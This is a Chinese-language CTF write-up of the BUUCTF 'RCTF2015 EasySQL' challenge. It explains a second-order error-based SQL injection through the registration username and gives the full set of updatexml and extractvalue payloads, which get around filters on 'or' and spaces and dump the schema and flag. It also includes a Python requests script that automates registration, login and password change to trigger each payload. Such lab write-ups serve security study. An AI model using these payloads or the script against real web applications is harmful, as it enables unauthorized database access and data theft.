[BUUCTF] 集训第八天

[RCTF2015]EasySQL

测试找一下报错


点击用户名查看到信息，可以改密码
修改密码发现报错信息在user处，

猜测sql语句 select * from user where username=" " and pwd=' '

or被过滤，可以使用||。
空格被过滤了，可以用()

fuzz一下，updatexml和extravalue均可利用

这里使用报错注入构造payload

• 报错注入

知识点： 十种Mysql报错注入

• updatexml

爆库

j1a"||updatexml(1,concat(0x7e,(select(database())),0x7e),1)#

爆表

j1a"||updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#

爆字段
不在flag表里，别被骗了

j1a"||updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1)#

j1a"||updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users))),1)#

查不到

• 正则匹配搜索

知识点： Mysql中正则表达式Regexp常见用法

j1a"||updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1)#

不完整
- 过滤了right、left，用reverse逆序输出

j1a"||updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1)#

再脚本正序输出+拼接

list = ":}c8d139b3f173-beeb-1f04-86c8-7d"
list = list[::-1]

print(list)

#:flag{f5be28d7-8c68-40f1-beeb-37

#            d7-8c68-40f1-beeb-371f3b931d8c}:

#flag{f5be28d7-8c68-40f1-beeb-371f3b931d8c}

汇总请求+脚本学习：

import requests

url_reg = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/register.php'
url_log = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/login.php'
url_change = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/changepwd.php'

pre = 'j1a"'
tail = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
	data = {
		'username' : name,
		'password' : '123',
		'email' : '123',
	}
	r.post(url=url_reg, data=data)

def login(name):
	data = {
		'username' : name,
		'password' : '123',
	}
	r.post(url=url_log, data=data)
	
def changepwd():
	data = {
		'oldpass' : '',
		'newpass' : '',
	}
	kk = r.post(url=url_change, data=data)
	if 'target' not in kk.text:
		print(kk.text)

for i in s:
	paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + tail
	register(paylaod)
	login(paylaod)
	changepwd()

这里一把梭匹配有flag字段的搜索

• extravalue

j1a"||(extractvalue(1,concat(0x7e,(select(database())),0x7e)));#

j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)));#

j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e)));#

j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where((real_flag_1s_here)regexp('^f'))),0x7e)));#		

j1a"||(extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where((real_flag_1s_here)regexp('^f')))),0x7e)));#